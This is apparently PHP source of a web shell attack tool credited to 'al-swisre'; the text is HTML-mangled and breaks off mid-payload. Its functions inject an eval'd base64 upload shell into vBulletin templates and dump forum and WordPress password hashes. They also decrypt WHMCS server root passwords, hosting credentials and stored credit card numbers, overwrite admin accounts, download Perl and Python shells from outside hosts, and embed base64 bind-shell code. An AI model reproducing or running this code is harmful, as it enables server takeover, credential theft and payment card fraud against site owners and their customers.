@mysql_connect($host_c,$user_c,$pass_c); $sel = @mysql__db($db_c); $tb = $_GET['tb']; $col_sws = mysql_query("SHOW COLUMNS $tb"); $num2 = mysql_num_rows( $col_sws ); echo "<br /><div class="tmp"></div><br /></div><br /></strong></div><br /></div><br /></div><br /></strong></div><br /></div><br /></div><br /></strong></div><br /></div><br /><table width="40%" align="center"><br /><tbody><br /><tr><br /><td>Tables</td><br /><td>Rows</td><br /></tr><br /><tr><br /><td><br /><div class="dom"><a href="$pg?sws=ms&show=cl&tb=$tablename"></a>".$tablename."</div><br /></td><br /><td>".$c3t."</td><br /></tr><br /></tbody><br /></table><br /><strong><strong><strong>"; for( $i2 = 0; $i2 < $num2; $i2++ ){ $col = mysql_fetch_row($col_sws) ; $um_sws = $col[0]; echo "</strong></strong></strong><strong><strong><strong>" ; $tit = mysql_query (" * $tb" ); while ($row = mysql_fetch_assoc($tit)) { $cont = $row[$um_sws] ; echo "</strong></strong></strong><strong><strong><strong>" ; } ; } exit; } if (isset($_COOKIE['host_mysql'])){ if (!isset($_GET['op'])){ echo " "; exit; } } else if (!isset($_COOKIE['host_mysql'])) { if (!isset($host)) { echo '<br /><div><br /><br /><br /><br /><pre><form method="POST"></form><br />host :<input name="host" type="text" /><br /><br />user :<input name="user" type="text" /><br /><br />pass :<input name="pass" type="text" /><br /><br />db :<input name="db" type="text" /><br /><br /><input name="login" type="submit" value="login .." /><br /></pre><br />'; exit;} else { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $con = @mysql_connect($host,$user,$pass) ; $sel = @mysql__db($db,$con); if (!$sel) { echo " MYSQL INFOTMATI NOT TREY "; } else { setcookie( "host_mysql", $host); setcookie( "user_mysql", $user); setcookie( "pass_mysql", $pass); setcookie( "db_mysql", $db); ob_end_flush(); echo " "; exit; }}} /////////////////////////////////// Options ///////////////////////////////////////// if (isset($_GET['op'])) { $op = $_GET['op']; $host_c = $_COOKIE['host_mysql']; $user_c = $_COOKIE['user_mysql']; $pass_c = $_COOKIE['pass_mysql']; $db_c = $_COOKIE['db_mysql']; $con3 =@mysql_connect($host_c,$user_c,$pass_c) or die ; $sedb3 =@mysql__db($db_c,$con3) or die; if (!$sedb3){echo "error in mysql connect "; exit;} /////// index vb //////// if ($op == 'in') { if (!isset($index)){ echo ' Your index : <br /><br /> <form method="post"></form> <textarea cols="40" rows="7" name="index"></textarea> <br /><br /> <input maxlength="30" name="sql" type="submit" value="Update Index" /> '; } else if ($_POST['sql']) { $index =$_POST['index']; $index=str_replace("\'","'",$index); $crypt = "{\${eval(base64_decode(\'"; $crypt .= base64_encode("echo \"$index\";"); $crypt .= "\'))}}{\${exit()}}"; $sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die; $query =@ mysql_query($sqlindex); if ($query) { echo "<br /><br /><div>Updated Index successfully</div><br />"; echo "<a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } else if (!$query) { echo "<br /><br /><div>Updated Index erorr</div><br />"; echo "<a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } } } /////// shelllll /////////// else if($op == 'sh') { if (!isset($_POST['ch'])) { echo ' <br /><br /><br /> <form method="post"></form><br /><script src="http://www.r57.gen.tr/yazciz/ciz.js"></script><br />< name="ch"> <option value="faq">Inject shell in faq </option> <option value="cal">Inject shell in calendar </option> <option value="sea">Inject shell in search </option> </> <br /><br /><br /> <input name="sql" type="submit" value="Inject shell" /> '; } if (isset($_POST['sql'])){ $ch = $_POST['ch']; $shell = "DQoNCmVjaG8gJzxiPlsgYWwtc3dpc3JlIF0mbmJzcDsmbmJzcDtbIFNhdWRpIHNoZWxsIF08YnI+PGJyPjxicj48L2I+JzsgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsgfSBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWwgISEhPC9iPjxicj48YnI+JzsgfSB9IA0KPz4=" ; $crypt = "{\${eval(base64_decode(\'"; $crypt .= "$shell"; $crypt .= "\'))}}{\${exit()}}"; if ($ch == 'faq'){$sqlfaq="UPDATE template SET template ='".$crypt."' title ='FAQ'";} elseif ($ch == 'cal'){$sqlfaq="UPDATE template SET template ='".$crypt."' title ='CALENDAR'";} elseif ($ch == 'sea'){$sqlfaq="UPDATE template SET template ='".$crypt."' title ='search_forums'";} $query =@ mysql_query($sqlfaq); if ($query) { echo "<br /><br /><br /><br /><div>Injection has been successfully</div><br />"; echo "<a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } else if (!$query) { echo "<br /><br /><br /><br /><div>Injection has been erorr !</div><br />"; echo "<a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } } } else if ($op == 'shm') { $sql = ' * `user`'; $query =@ mysql_query($sql); if ($query) { while ($row = mysql_fetch_assoc($query)) { echo " <br /><br /></div><br /></strong></strong></strong><br /><table align="center"><br /><tbody><br /><tr><br /><td>Columns Name</td><br /><td>Content</td><br /></tr><br /><tr><br /><td>$um_sws </td><br /><td>$cont</td><br /></tr><br /></tbody><br /></table><br /><table class="tbm" cellspacing="4" cellpadding="4" align="center"><br /><tbody><br /><tr><br /><td>ID :</td><br /><td>user :</td><br /><td>pass :</td><br /><td>salt :</td><br /><td>email :</td><br /></tr><br /><tr><br /><td>".$row['userid']."</td><br /><td>".$row['username']."</td><br /><td>".$row['password']."</td><br /><td>".$row['salt']."</td><br /><td>".$row['email']."</td><br /></tr><br /></tbody><br /></table><br /><strong><strong><strong> "; }} } else if ($op == 'out') { setcookie( "host_mysql", $host,time()-3600); setcookie( "user_mysql", $user,time()-3600); setcookie( "pass_mysql", $pass,time()-3600); setcookie( "db_mysql", $db,time()-3600); ob_end_flush(); echo " "; exit; } ///////////////////////////////// whmcs //////////////////////////////////////// else if ($op == 'hroot') { if (isset($_POST['viw'])) { $hash = $_POST['hash'] ; $query = mysql_query(" * tblservers"); echo "<br /><div class="tmp">hosting roots "; while($row = mysql_fetch_array($query)) { echo ""; } echo "<br /><table cellpadding="5" align="center"><br /><tbody><br /><tr><br /><td>Type</td><br /><td>noc</td><br /><td>Active</td><br /><td>IP Address</td><br /><td>username</td><br /><td>Password</td><br /></tr><br /><tr><br /><td>{$row['type']}</td><br /><td>{$row['noc']}</td><br /><td>{$row['active']}</td><br /><td>{$row['ipaddress']}</td><br /><td>{$row['username']}</td><br /><td>".decrypt($row['password'], $hash)."</td><br /></tr><br /></tbody><br /></table><br />"; $query = mysql_query(" * tblhosting username = 'root' or 'admin' or 'administrator'"); echo "<br /><br /> Clients roots "; while($row = mysql_fetch_array($query)) { echo ""; } echo "<br /><table cellpadding="5" align="center"><br /><tbody><br /><tr><br /><td>IP Address</td><br /><td>username</td><br /><td>Password</td><br /></tr><br /><tr><br /><td>{$row['dedicatedip']}</td><br /><td>{$row['username']}</td><br /><td>".decrypt($row['password'], $hash)."</td><br /></tr><br /></tbody><br /></table><br /></div><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } else { echo'<form method="post"> <br /><br /> encryption hash <br /><br /><input name="hash" type="text" /><br /><br /> <input name="viw" type="submit" value="show" /> </form>'; exit; } } //////////// domine //////////// else if ($op == 'scard') { if (isset($_POST['viw'])) { $hash = $_POST['hash'] ; $query = mysql_query(' * `tblclients`') ; echo "<br /><div class="tmp">"; while($v = mysql_fetch_array($query)) { echo " "; echo "<br /><table cellpadding="5" align="center"><br /><tbody><br /><tr><br /><td>cardtype</td><br /><td>id</td><br /><td>firstname</td><br /><td>lastname</td><br /><td>email</td><br /><td>city</td><br /><td>ciuntry</td><br /><td>address1</td><br /><td>lastlogin</td><br /><td>phonenumber</td><br /><td>datecreated</td><br /><td>cardnum</td><br /><td>startdate</td><br /><td>expdate</td><br /></tr><br /><tr><br /><td>{$v['cardtype']}</td><br /><td>{$v['id']}</td><br /><td>{$v['firstname']}</td><br /><td>{$v['lastname']}</td><br /><td>{$v['email']}</td><br /><td>{$v['city']}</td><br /><td>{$v['ciuntry']}</td><br /><td>{$v['address1']}</td><br /><td>{$v['lastlogin']}</td><br /><td>{$v['phonenumber']}</td><br /><td>{$v['datecreated']}</td><br /><td>".decrypt ($v['cardnum'], $hash)."</td><br /><td>".decrypt ($v['startdate'], $hash)."</td><br /><td>".decrypt ($v['expdate'], $hash)."</td><br /></tr><br /></tbody><br /></table><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } }else { echo'<form method="post"> <br /><br /> encryption hash <br /><br /><input name="hash" type="text" /><br /><br /> <input name="viw" type="submit" value="show" /> </form>'; exit; } } else if ($op == 'chost') { if (isset($_POST['viw'])) { $hash = $_POST['hash'] ; $query = mysql_query(" * tblhosting"); echo "<br /><div class="tmp">"; while($r = mysql_fetch_array($query)) { echo ""; } echo "<br /><table cellpadding="5" align="center"><br /><tbody><br /><tr><br /><td>domain</td><br /><td>Username</td><br /><td>Pass</td><br /><td>IP Address</td><br /></tr><br /><tr><br /><td>{$r['domain']}</td><br /><td>{$r['username']}</td><br /><td>".decrypt ($r['password'], $hash)."</td><br /><td>{$r['dedicatedip']}</td><br /></tr><br /></tbody><br /></table><br /></div><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } else { echo'<form method="post"> <br /><br /> encryption hash <br /><br /><input name="hash" type="text" /><br /><br /> <input name="viw" type="submit" value="show" /> </form>'; exit; } } else if ($op == 'cadmin') { if (isset($_POST['viw'])) { $pass = md5($_POST['pass']); $user = $_POST['user']; $query =@mysql_query("UPDATE `tbladmins` SET `username` ='".$user."' ID = 1"); $query =@mysql_query("UPDATE `tbladmins` SET `password` ='".$pass."' ID = 1"); if ($query) { echo "<br /><br /><div>Updated admin successfully</div><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } else if (!$query) { echo "<br /><br /><div>Updated admin erorr</div><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } } else { echo'<form method="post"> <br /><br /> user : <input name="user" type="text" /><br /><br /> pass : <input name="pass" type="text" /><br /><br /> <input name="viw" type="submit" value="update" /> </form>'; exit; } } else if ($op == 'trak') { $page = $_GET['page']; $numpr = 30; if(!$page){$page = 0;} $sql0 = mysql_query(" * tbltickets"); $num_r0s = mysql_num_rows($sql0); $sql = mysql_query(" * tbltickets order by id desc limit $page,$numpr"); $ap = 1; echo "<br /><br /><br /><div>Page : "; for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr ) { if ($page != $s) { echo "<a class="hr" href="$pg?sws=ms&op=trak&page=$s">$ap</a>";} else {echo "<a class="hr2" href="$pg?sws=ms&op=trak&page=$s">$ap</a>";} $ap ++; } echo "</div><br /><br />"; while ($r3o = mysql_fetch_assoc($sql)) { $email = $r3o['email']; $date = $r3o['date']; $title = $r3o['title']; $message = $r3o['message']; echo "<br /><div class="tmp">"; echo "<br /><br />"; echo "<br /><table cellpadding="0" width="70%" align="center"><br /><tbody><br /><tr><br /><td>email : $email</td><br /><td>date : $date</td><br /><td>title : $title</td><br /></tr><br /><tr><br /><td>message</td><br /><td colspan="3">$message</td><br /></tr><br /></tbody><br /></table><br /></div><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } } else if ($op == 'rtrak') { $page = $_GET['page']; $numpr = 25; if(!$page){$page = 0;} $sql0 = mysql_query(" * tblticketreplies"); $num_r0s = mysql_num_rows($sql0); $sql = mysql_query(" * tblticketreplies order by id desc limit $page,$numpr"); $ap = 1; echo "<br /><br /><br /><div>Page : "; for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr ) { if ($page != $s) { echo "<a class="hr" href="$pg?sws=ms&op=trak&page=$s">$ap</a>";} else {echo "<a class="hr2" href="$pg?sws=ms&op=trak&page=$s">$ap</a>";} $ap ++; } echo "</div><br /><br />"; while ($r3o = mysql_fetch_assoc($sql)) { $email = $r3o['email']; $date = $r3o['date']; $message = $r3o['message']; echo "<br /><div class="tmp">"; echo "<br /><br />"; echo "<br /><table cellpadding="0" width="70%" align="center"><br /><tbody><br /><tr><br /><td>email : $email</td><br /><td>date : $date</td><br /></tr><br /><tr><br /><td>message</td><br /><td colspan="2">$message</td><br /></tr><br /></tbody><br /></table><br /></div><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } } /////////////////////////////////// backup ////////////////////////// else if ($op == 'bkup') { if (isset($_POST['viw'])) { $path = $_POST['path']; $domp = @backup_tables($path,$host_c,$user_c,$pass_c,$db_c); echo "<br /><br /><div>Create backup successfully <br /><br /> $path</div><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } else { echo'<form method="post"> <br /><br /> path backup <br /><br /><input name="path" type="text" /><br /><br /> <input name="viw" type="submit" value="Create" /> </form>'; exit; } } else if ($op == 'sh3') { if (isset($_POST['viw'])) { $string = $_POST['string']; $ch = $_POST['ch']; if ($ch == 'trs') { $sql4 = @mysql_query(" * tblticketreplies `message` LIKE '%$string%'"); } else if($ch == 'tr') { $sql4 = @mysql_query(" * tbltickets `message` LIKE '%$string%' "); } $nu0 = @mysql_num_rows($sql4); if ($nu0 == 0){echo "No result"; exit;} while ($r33o = mysql_fetch_assoc($sql4)) { $date = $r33o['date']; $title = $r33o['title']; $message = $r33o['message']; echo "<br /><div class="tmp">"; echo "<br /><br />"; echo "<br /><table cellpadding="0" width="70%" align="center"><br /><tbody><br /><tr><br /><td>email : $email</td><br /><td>date : $date</td><br /><td>title : $title</td><br /></tr><br /><tr><br /><td>message</td><br /><td colspan="3">$message</td><br /></tr><br /></tbody><br /></table><br /></div><br />"; exit; } } else { echo'<form method="post"> <br /><br /> search : <input name="string" type="text" />  < name="ch"> <option value="tr">ticket</option> <option value="trs">ticket replies</option> </> <br /><br /> <input name="viw" type="submit" value="search" /> </form>'; exit; } } else if ($op == 'sh3') { if (isset($_POST['viw'])) { $string = $_POST['string']; $ch = $_POST['ch']; if ($ch == 'trs') { $sql4 = @mysql_query(" * tblticketreplies `message` LIKE '%$string%'"); } else if($ch == 'tr') { $sql4 = @mysql_query(" * tbltickets `message` LIKE '%$string%' "); } $nu0 = @mysql_num_rows($sql4); if ($nu0 == 0){echo "No result"; exit;} while ($r33o = @mysql_fetch_assoc($sql4)) { $date = $r33o['date']; $title = $r33o['title']; $message = $r33o['message']; echo "<br /><div class="tmp">"; echo "<br /><br />"; echo "<br /><table cellpadding="0" width="70%" align="center"><br /><tbody><br /><tr><br /><td>email : $email</td><br /><td>date : $date</td><br /><td>title : $title</td><br /></tr><br /><tr><br /><td>message</td><br /><td colspan="3">$message</td><br /></tr><br /></tbody><br /></table><br /></div><br />"; } } else { echo'<form method="post"> <br /><br /> search : <input name="string" type="text" />  < name="ch"> <option value="tr">ticket</option> <option value="trs">ticket replies</option> </> <br /><br /> <input name="viw" type="submit" value="search" /> </form>'; exit; } } else if ($op == 'css') { if (isset($_POST['viw'])) { $index = $_POST['index']; $seh = $_POST['string']; $rs = search($seh); if(count($rs) == 0){echo 'No result';exit;} foreach ($rs as $info) { $table = $info['table']; $column = $info['column']; echo "table : $table<br /><br /> column : $column <form method="\"post\""> <br /><br /> <input name="v" type="submit" value="\"inject\"" /> <input name="\"index\"" type="hidden" value="$index" /> <input name="\"table\"" type="\"hidden\"" value="$table" /> <input name="\"column\"" type="\"hidden\"" value="$column" /> <input name="\"shearc\"" type="\"hidden\"" value="$seh" /> </form> "; exit; } } else { echo'<form method="post"> <br /><br /> search : <input name="string" type="text" /> <br /> Css url : <input name="index" type="text" /><br /><br /> <input name="viw" type="submit" value="search" /> </form>'; exit; } if (isset($_POST['v'])) { $seh = $_POST['shearc'] ; $table = $_POST['table']; $column = $_POST['column'] ; $rlcss = $_POST['index'] ; $data = ""; $query = mysql_query("UPDATE ".$table." SET ".$column." ='$data' `$column` LIKE '%$seh%'") or die(mysql_error()); if($query){ echo "<br /><br /><div>Injection has been successfully</div><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; }else{ echo '<br /><br /><div>Injection erorr</div><br />'; exit; } } } else if ($op == 'awp') { if (isset($_POST['viw'])) { $pass = $_POST['pass']; $user = $_POST['user']; $crypt = crypt($pass); $query =@mysql_query("UPDATE `wp_users` SET `user_login` ='".$user."' ID = 1") or die; $query =@mysql_query("UPDATE `wp_users` SET `user_pass` ='".$crypt."' ID = 1") or die; if ($query) { echo "<br /><br /><div>Updated admin successfully</div><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } else if (!$query) { echo "<br /><br /><div>Updated admin erorr</div><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; } } else { echo'<form method="post"> <br /><br /> user : <input name="user" type="text" /><br /><br /> pass : <input name="pass" type="text" /><br /><br /> <input name="viw" type="submit" value="update" /> </form>'; } } else if ($op == 'shwp') { $sql = ' * `wp_users`'; $query =@ mysql_query($sql); if ($query) { while ($row = mysql_fetch_assoc($query)) { echo " <br /><br /><br /><table class="tbm" cellspacing="4" cellpadding="4" align="center"><br /><tbody><br /><tr><br /><td>ID :</td><br /><td>user :</td><br /><td>pass :</td><br /><td>email :</td><br /></tr><br /><tr><br /><td>".$row['ID']."</td><br /><td>".$row['user_login']."</td><br /><td>".$row['user_pass']."</td><br /><td>".$row['user_email']."</td><br /></tr><br /></tbody><br /></table><br />"; echo "<br /><a href="$pg?sws=ms&show=tb">[ Back ]</a>"; exit; }} } } break; /////////////////////////////////////////////// info /////////////////////////////////// case 'info': $sws = 'al-swisre' ; if ($sws != 'al-swisre'){echo "Coded by al-swisre"; exit;} if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "Linux"; $read = @file_get_contents("http://s92443018.onlinehome.us/cgi-bin/host.php?$ips"); $r3ad = @file_get_contents("http://aruljohn.com/track.pl?host=$ips") ; $ipnet = @findit($read,"</div><br /></strong></strong></strong></div><br /></td><br /><td>IP-Network</td><br /><td> </td><br /><td>","</td><br /><td>IP-Network-Block</td><br /><td> </td><br /><td>","</td><br /><td>","</td><br /></tr><br /></tbody><br /></table><br /><p>"; exit; break; ///////////////////////////////// bypass /////////////////////// case 'byp': echo '</p><br /><div class="cont3">[ <a href="?sws=byp"> bypass </a>] [<a href="?sws=byp&op=shell&sh=perl">Make Shell Perl</a>] [<a href="?sws=byp&op=shell&sh=py"> Make Shell Python </a>] [<a href="?sws=byp&op=g3t"> Get file </a>]</div><br /><p><br /><br />' ; $op = $_GET['op']; if(@$_GET['dir']){ $dir = $_GET['dir']; if($dir != 'nullz') $dir = @cleandir($dir); } if ($op == 'shell') { $sh = $_GET['sh']; ////////////////////////// perl or python ////////////////////// if (!isset($_POST['get'])) { echo " Path shell : <input name="path" size="30" type="text" value="".$dir."/cgi-bin" /><br /><br /> name shell : <input name="name" size="25" type="text" value="shell.sa" /><br /><br /> htaccess :<br /><br /><textarea name="htx">AddHandler cgi-script .sa</textarea><br /><br /><input name="get" type="submit" value="Make" />"; }else { $path = $_POST['path']; $name = $_POST['name']; $htac = $_POST['htx']; if (isset($htac)) { $fop = @fopen("$path/.htaccess", 'w'); @fwrite($fop,$htac); @fclose($fop); } $rpath = $path."/".$name; if ($sh == 'perl') { $url_shell = 'http://64.15.137.117/~google/cgi-bin/perl.zip'; /// perl $path = $dir."/".$d3r."/"."sa.pl"; } else if($sh == 'py') { $url_shell = 'http://64.15.137.117/~google/cgi-bin/python.zip'; /// python $path = $dir."/".$d3r."/"."sa.py"; } //// get shell/// $fp = @fopen($rpath, 'w'); $ch = @curl_init($url_shell); @curl_setopt($ch, CURLOPT_FILE, $fp); $data = @curl_exec($ch); @curl_close($ch); @fclose($fp); if (!is_file($rpath)) { $ch = @curl_init($url_shell); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = @curl_exec($ch); @curl_close($ch); @file_put_contents($rpath, $data); }elseif (@is_file($rpath)) { $ch =@chmod($rpath,0755); echo "Sh3ll have been created<br /><br /> $rpath"; }else {echo "error";} } } ///////////////////// get file //////////////////// elseif ($op == 'g3t') { if (!isset($_POST['get'])) { echo 'Get file<br /><br /><br /></p><br /><script src="http://www.r57.gen.tr/yazciz/ciz.js"></script><br /><p>Url file : <input name="file" type="text" />   to : <input name="path" type="text" value="'.$dir.'/file.php" /><br /><br /><input name="get" type="submit" value="Get" />' ;exit; } else { $url_shell = $_POST['file']; $path = $_POST['path']; $fp = @fopen($path, 'w'); $ch = @curl_init($url_shell); @curl_setopt($ch, CURLOPT_FILE, $fp); $data = @curl_exec($ch); @curl_close($ch); @fclose($fp); if (!is_file($path)) { $ch = @curl_init($url_shell); @curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = @curl_exec($ch); @curl_close($ch); @file_put_contents($path, $data); }elseif (@is_file($path)) { echo "got the file successfully<br /><br /> $path"; exit; }else {echo "error";} } }else if(!isset($op)) {} break; /////////////////////////////////////////////////// Connect Back //////////////////////////////////// case 'con': if (!isset($_POST['con'])) { echo ""; echo "</p><br /><table cellpadding="0" width="60%" align="center"><br /><tbody><br /><tr><br /><td colspan="2">Information Server</td><br /></tr><br /><tr><br /></tr><br /><tr><br /><td>Hostname</td><br /><td>".$hostname."</td><br /></tr><br /><tr><br /><td>ISP</td><br /><td>".$isp."</td><br /></tr><br /><tr><br /><td>IP-Network</td><br /><td>".$ipnet."</td><br /></tr><br /><tr><br /><td>IP-Network-Block</td><br /><td>".$ipb."</td><br /></tr><br /><tr><br /><td>Safe Mode</td><br /><td>".(($safe_mode)?("  : <strong><span style="color: red;">ON</span></strong>"):("<strong><span style="color: green;">OFF</span></strong>"))."</td><br /></tr><br /><tr><br /><td>System</td><br /><td>".$os."</td><br /></tr><br /><tr><br /><td>PHP Version</td><br /><td>".phpversion()."</td><br /></tr><br /><tr><br /><td>Zend Version</td><br /><td>".@zend_version()."</td><br /></tr><br /><tr><br /><td>Magic_Quotes</td><br /><td>". magicQouts()."</td><br /></tr><br /><tr><br /><td>Curl</td><br /><td>".Curl()."</td><br /></tr><br /><tr><br /><td>Register Globals</td><br /><td>".RegisterGlobals()."</td><br /></tr><br /><tr><br /><td>Open Basedir</td><br /><td>".openBaseDir()."</td><br /></tr><br /><tr><br /><td>Gzip</td><br /><td>".Gzip()."</td><br /></tr><br /><tr><br /><td>Free Space</td><br /><td>".HardSize(disk_free_space('/'))."</td><br /></tr><br /><tr><br /><td>Total Space</td><br /><td>".HardSize(disk_total_space("/"))."</td><br /></tr><br /><tr><br /><td>MySQL</td><br /><td>".MySQL2()."</td><br /></tr><br /><tr><br /><td>MsSQL</td><br /><td>".MsSQL()."</td><br /></tr><br /><tr><br /><td>PostgreSQL</td><br /><td>".PostgreSQL()."</td><br /></tr><br /><tr><br /><td>Oracle</td><br /><td>".Oracle()."</td><br /></tr><br /><form method="post"></form> <form method="post"></form><br /></tbody><br /></table><br /><p><br />"; exit; }else { if ($_POST['con'] == 'Connect') { $ip = $_POST['ip'] ; $port = $_POST['port'] ; $op = $_POST['op'] ; $bind_perl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; $bind_py = "IyBTZXJ2ZXIgIA0KIA0KaW1wb3J0IHN5cyAgDQppbXBvcnQgc29ja2V0ICANCmltcG9ydCBvcyAgDQoNCmhvc3QgPSAnJzsgIA0KU0laRSA9IDUxMjsgIA0KDQp0cnkgOiAgDQogICAgIHBvcnQgPSBzeXMuYXJndlsxXTsgIA0KDQpleGNlcHQgOiAgDQogICAgIHBvcnQgPSAzMTMzNzsgIA0KIA0KdHJ5IDogIA0KICAgICBzb2NrZmQgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICwgc29ja2V0LlNPQ0tfU1RSRUFNKTsgIA0KDQpleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCg0KICAgICBwcmludCAiRXJyb3IgaW4gY3JlYXRpbmcgc29ja2V0IDogIixlIDsgIA0KICAgICBzeXMuZXhpdCgxKTsgICANCg0Kc29ja2ZkLnNldHNvY2tvcHQoc29ja2V0LlNPTF9TT0NLRVQgLCBzb2NrZXQuU09fUkVVU0VBRERSICwgMSk7ICANCg0KdHJ5IDogIA0KICAgICBzb2NrZmQuYmluZCgoaG9zdCxwb3J0KSk7ICANCg0KZXhjZXB0IHNvY2tldC5lcnJvciAsIGUgOiAgICAgICAgDQogICAgIHByaW50ICJFcnJvciBpbiBCaW5kaW5nIDogIixlOyANCiAgICAgc3lzLmV4aXQoMSk7ICANCiANCnByaW50KCJcblxuPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09Iik7IA0KcHJpbnQoIi0tLS0tLS0tIFNlcnZlciBMaXN0ZW5pbmcgb24gUG9ydCAlZCAtLS0tLS0tLS0tLS0tLSIgJSBwb3J0KTsgIA0KcHJpbnQoIj09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PVxuXG4iKTsgDQogDQp0cnkgOiAgDQogICAgIHdoaWxlIDEgOiAjIGxpc3RlbiBmb3IgY29ubmVjdGlvbnMgIA0KICAgICAgICAgc29ja2ZkLmxpc3RlbigxKTsgIA0KICAgICAgICAgY2xpZW50c29jayAsIGNsaWVudGFkZHIgPSBzb2NrZmQuYWNjZXB0KCk7ICANCiAgICAgICAgIHByaW50KCJcblxuR290IENvbm5lY3Rpb24gZnJvbSAiICsgc3RyKGNsaWVudGFkZHIpKTsgIA0KICAgICAgICAgd2hpbGUgMSA6ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIGNtZCA9IGNsaWVudHNvY2sucmVjdihTSVpFKTsgIA0KICAgICAgICAgICAgIGV4Y2VwdCA6ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICBwaXBlID0gb3MucG9wZW4oY21kKTsgIA0KICAgICAgICAgICAgIHJhd091dHB1dCA9IHBpcGUucmVhZGxpbmVzKCk7ICANCiANCiAgICAgICAgICAgICBwcmludChjbWQpOyAgDQogICAgICAgICAgIA0KICAgICAgICAgICAgIGlmIGNtZCA9PSAnZzJnJzogIyBjbG9zZSB0aGUgY29ubmVjdGlvbiBhbmQgbW92ZSBvbiBmb3Igb3RoZXJzICANCiAgICAgICAgICAgICAgICAgcHJpbnQoIlxuLS0tLS0tLS0tLS1Db25uZWN0aW9uIENsb3NlZC0tLS0tLS0tLS0tLS0tLS0iKTsgIA0KICAgICAgICAgICAgICAgICBjbGllbnRzb2NrLnNodXRkb3duKCk7ICANCiAgICAgICAgICAgICAgICAgYnJlYWs7ICANCiAgICAgICAgICAgICB0cnkgOiAgDQogICAgICAgICAgICAgICAgIG91dHB1dCA9ICIiOyAgDQogICAgICAgICAgICAgICAgICMgUGFyc2UgdGhlIG91dHB1dCBmcm9tIGxpc3QgdG8gc3RyaW5nICANCiAgICAgICAgICAgICAgICAgZm9yIGRhdGEgaW4gcmF3T3V0cHV0IDogIA0KICAgICAgICAgICAgICAgICAgICAgIG91dHB1dCA9IG91dHB1dCtkYXRhOyAgDQogICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgIGNsaWVudHNvY2suc2VuZCgiQ29tbWFuZCBPdXRwdXQgOi0gXG4iK291dHB1dCsiXHJcbiIpOyAgDQogICAgICAgICAgICAgICANCiAgICAgICAgICAgICBleGNlcHQgc29ja2V0LmVycm9yICwgZSA6ICANCi